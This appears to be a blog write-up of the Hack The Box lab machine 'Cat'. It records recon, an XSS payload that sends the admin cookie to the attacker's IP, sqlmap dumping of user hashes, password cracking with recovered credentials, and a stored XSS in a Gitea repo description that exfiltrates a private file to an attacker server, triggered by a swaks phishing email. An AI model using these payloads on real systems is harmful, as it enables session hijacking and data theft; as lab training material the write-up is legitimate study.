Yuvraj Singh | Cybersecurity & AI Enthusiast

HTB - CAT

4 min read

Recon:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-02 00:35 IST
Nmap scan report for 10.10.11.53 (10.10.11.53)
Host is up (0.42s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://cat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.76 seconds

Enumeration:

  • There are 5 pages we can see, register and login
  • admin:admin and got access and we get an page to upload a image file.
  • checking if it filtering file or not, this could be way to user

  • used git dump and got the source and found xss, sql,csrf vulenrabilties
 #port 80
 <img src=x onerror=this.src="http://10.10.16.51/"+btoa(document.cookie)>
  • started python server on port 80 and listining to get admin cookie

  • now we have admin cookie, next i noticed from source code we dumped is accept_cat.php
sqlmap -u "http://cat.htb/accept_cat.php" --data "catId=1&catName=normal" --cookie="PHPSESSID=61c0u782gl2ihhlarqjgl1n62s" -p catName --level=5 --risk=3 --dbms=SQLite --dump

  • have to do quick otherwise we get new cookie
sqlmap -u "http://cat.htb/accept_cat.php" --data "catId=1&catName=normal" --cookie="PHPSESSID=upobbgr3j8qlofomit1v37gmfv" -p catName --level=5 --risk=3 --dbms=SQLite
--dump -T users -C username,password --threads=10

  • axel not crackable but we got a user rosa with md5 hash
john rosa --format=raw-md5 --wordlist=~/Downloads/rockyou.txt
soyunaprincesarosa
  • we don't any user flag, axel got it, checking ports and forwading them

  • we have gitea

grep -iR "axel" /var/log

aNdZwgC4tI9gnVXv_e3Q
  • with this we can login to gitea as rosa did not work and also ssh with axel and user flag
find / -type f -name "*.db" 2>/dev/null

  • cat.db has the users, the same that we dumped with sqlinjection
  • now with exploit as gitea is vulnerable to xss and following instructions from exploit
From rosa@cat.htb  Sat Sep 28 04:51:50 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592
        for <axel@cat.htb>; Sat, 28 Sep 2024 04:51:50 GMT
Received: (from rosa@localhost)
        by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591
        for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT
Date: Sat, 28 Sep 2024 04:51:49 GMT
From: rosa@cat.htb
Message-Id: <202409280451.48S4pnlT001591@cat.htb>
Subject: New cat services
 
Hi Axel,
 
We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.
 
Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.
 
From rosa@cat.htb  Sat Sep 28 05:05:28 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
        for <axel@cat.htb>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
        by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
        for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management
 
We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.

ROOT

1. create new repo
2. Description contains the payload
<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.14.xxx:8000/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">XSS test</a>

3. create a new file in same repo and commit changes
4. send mail to jobert using curl or swaks
5. before that run the python server with port set in payload

swaks --to "jobert@localhost" --from "axel@localhost" --header "Subject: click link" --body "http://localhost:3000/axel/xss" --server localhost --port 25 --timeout 30s
  • here xss is the repo name

  • url decoded and we got another pass

Graph View